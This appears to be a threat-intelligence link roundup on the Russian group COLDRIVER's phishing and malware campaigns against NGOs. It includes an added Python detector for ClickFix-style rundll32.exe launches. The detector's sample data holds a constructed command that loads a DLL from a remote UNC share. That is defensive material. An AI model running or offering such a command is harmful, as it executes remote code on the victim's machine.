🇷🇺 French NGO Reporters Without Borders targeted by #Calisto in recent campaign
Sekoia #TDR analysed a recent #Calisto (aka #ColdRiver #Star Blizzard) spear-phishing campaign aimed at Reporters sans frontières and other #Ukraine-supporting organisations.
https://blog.sekoia.io/ngo-reporters-without-borders-targeted-by-calisto-in-recent-campaign/
📰 Russian APT COLDRIVER Rapidly Deploys New NOROBOT Malware After Public Disclosure
🇷🇺 Russian APT COLDRIVER rapidly retooled after public disclosure, deploying new NOROBOT & MAYBEROBOT malware. The group is targeting NGOs & policy advisors with a new PowerShell backdoor. ⚡️ #COLDRIVER #APT #ThreatIntel #Russia
🔗 https://cyber.netsecops.io/articles/russian-apt-coldriver-deploys-new-malware-after-disclosure/?utm_source=mastodon&utm_medium=social&utm_campaign=twitter_auto

Russian APT COLDRIVER Rapidly Deploys New NOROBOT Malware After Public Disclosure
Russian APT group COLDRIVER (UNC4057) quickly deployed new malware families, NOROBOT and MAYBEROBOT, after its LOSTKEYS tool was publicly disclosed, targeting high-value individuals.
CyberNetSec.io
To Be (A Robot) or Not to Be: New Malware Attributed to Russia State-Sponsored COLDRIVER | Google Cloud Blog
Russia state-sponsored COLDRIVER started using new malware immediately following a May public disclosure of their activity.
Google Cloud Blog
COLDRIVER deploys BAITSWITCH and SIMPLEFIX via a ClickFix campaign using fake Cloudflare checks
Zscaler ThreatLabz has published a detailed analysis of a "ClickFix" campaign attributed to COLDRIVER that targets members of Russian civil society (dissidents, NGOs, human-rights defenders). The investigation highlights two new malware families, BAITSWITCH and SIMPLEFIX, and advanced social-engineering techniques.
• Attack chain: fake Cloudflare Turnstile checkboxes copy malicious rundll32.exe commands to the clipboard and prompt victims to execute them. The campaign is multi-stage and uses server-side filtering to narrow down targets and limit exposure.
CyberVeille
COLDRIVER Adds BAITSWITCH and SIMPLEFIX | ThreatLabz
The Russia-linked group COLDRIVER targeted dissidents and their supporters using a ClickFix technique, resulting in the deployment of BAITSWITCH and SIMPLEFIX.
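The ClickFix chain above ends with the victim pasting a rundll32.exe command into an interactive prompt. The following is an added detection example written for this page, not code from Zscaler, Sekoia or Google. It assumes (labelled in the comments) that the command is pasted into the Windows Run dialog, so the rundll32.exe process has explorer.exe as its parent, and that process-creation telemetry is available as Sysmon-style key=value lines; the sample events, the 203.0.113.5 share and the DLL names are constructed, not indicators from the write-ups.

```python
"""Flag rundll32.exe launches matching the ClickFix pattern described above.

Added example, not from any of the linked reports.
Assumptions: events are Sysmon Event ID 1 fields flattened to key=value pairs;
a Run-dialog launch appears with explorer.exe as parent (the usual ClickFix
vector, not stated on the page); the sample events below are constructed.
"""
import re

# Constructed sample events (not real telemetry). 203.0.113.5 is a
# documentation address; the DLL names are placeholders.
SAMPLE_EVENTS = [
    'Image=C:\\Windows\\System32\\rundll32.exe ParentImage=C:\\Windows\\explorer.exe '
    'CommandLine="rundll32.exe \\\\203.0.113.5\\share\\cf.dll,Verify"',
    'Image=C:\\Windows\\System32\\rundll32.exe ParentImage=C:\\Windows\\System32\\svchost.exe '
    'CommandLine="rundll32.exe shell32.dll,Control_RunDLL"',
    'Image=C:\\Windows\\System32\\rundll32.exe ParentImage=C:\\Windows\\explorer.exe '
    'CommandLine="rundll32.exe C:\\Users\\alice\\AppData\\Local\\Temp\\x.dll,Start"',
    'Image=C:\\Windows\\System32\\notepad.exe ParentImage=C:\\Windows\\explorer.exe '
    'CommandLine="notepad.exe notes.txt"',
]

# key=value pairs; a value is either a double-quoted string or a run of non-space
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> dict:
    """Flatten one key=value event line into a dict, stripping surrounding quotes."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit('\\', 1)[-1].lower()


def dll_argument(cmdline: str) -> str:
    """DLL argument of a rundll32 command line: the token after the exe,
    up to the comma that separates it from the export name."""
    parts = cmdline.split(None, 1)
    if len(parts) < 2:
        return ''
    return parts[1].split(',', 1)[0].strip('"')


def suspicious_dll(arg: str) -> bool:
    """True when the DLL is sourced from a UNC share, a URL, or a
    user-writable directory rather than a system location."""
    a = arg.lower()
    if a.startswith('\\\\') or a.startswith('http'):
        return True
    if '\\users\\' in a or '\\temp\\' in a:
        return True
    return False


def classify(event: dict) -> list:
    """Return the list of reasons an event looks like a ClickFix rundll32
    launch; an empty list means the event is not flagged."""
    reasons = []
    if basename(event.get('Image', '')) != 'rundll32.exe':
        return reasons
    # Assumption: explorer.exe as parent indicates an interactive (Run dialog)
    # launch. Control Panel applets also do this, so it is a weak signal alone.
    if basename(event.get('ParentImage', '')) == 'explorer.exe':
        reasons.append('rundll32 launched from explorer.exe (Run dialog / interactive)')
    if suspicious_dll(dll_argument(event.get('CommandLine', ''))):
        reasons.append('DLL loaded from UNC/URL/user-writable path')
    return reasons


def detect(lines) -> list:
    """Run classify() over event lines; returns (command line, reasons) pairs."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        reasons = classify(ev)
        if reasons:
            hits.append((ev.get('CommandLine', ''), reasons))
    return hits


if __name__ == '__main__':
    for cmd, why in detect(SAMPLE_EVENTS):
        print(cmd, '->', '; '.join(why))
```

Treat a hit with both reasons as high confidence and a hit with only the parent-process reason as something to triage: legitimate shell activity launches rundll32.exe from explorer.exe too, so the DLL-source check is what separates a pasted ClickFix command from normal use.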

Russia-linked ColdRiver used LostKeys malware in recent attacks
Since early 2025, Russia-linked ColdRiver has used LostKeys malware to steal files in espionage attacks on Western governments and orgs.
Security Affairs
COLDRIVER Using New Malware To Steal Documents From Western Targets and NGOs | Google Cloud Blog
Russian government-backed group COLDRIVER is using LOSTKEYS malware to steal files and system information from NGOs and western targets.
Google Cloud Blog
Rebekah Brown and John Scott-Railton on Distilling Cyber Policy podcast - The Citizen Lab
In the latest episode of the Distilling Cyber Policy podcast, Alex Botting and Jen Ellis from the Center for Cybersecurity Policy & Law are joined by Rebekah Brown and John Scott-Railton, senior researchers at the Citizen Lab. Together, they discuss the Citizen Lab's “Rivers of Phish” report on sophisticated phishing targeting Russia’s perceived adversaries. The report was a collaborative investigation with Access Now alongside civil society organizations First Department, Arjuna Team, and RESIDENT.ngo.
The Citizen Lab
Microsoft and DOJ disrupt Russian FSB hacker infrastructure
Microsoft and the US Department of Justice (DOJ) have dismantled the attack infrastructure of a Russian hacker group known as ColdRiver by
Tech Nieuws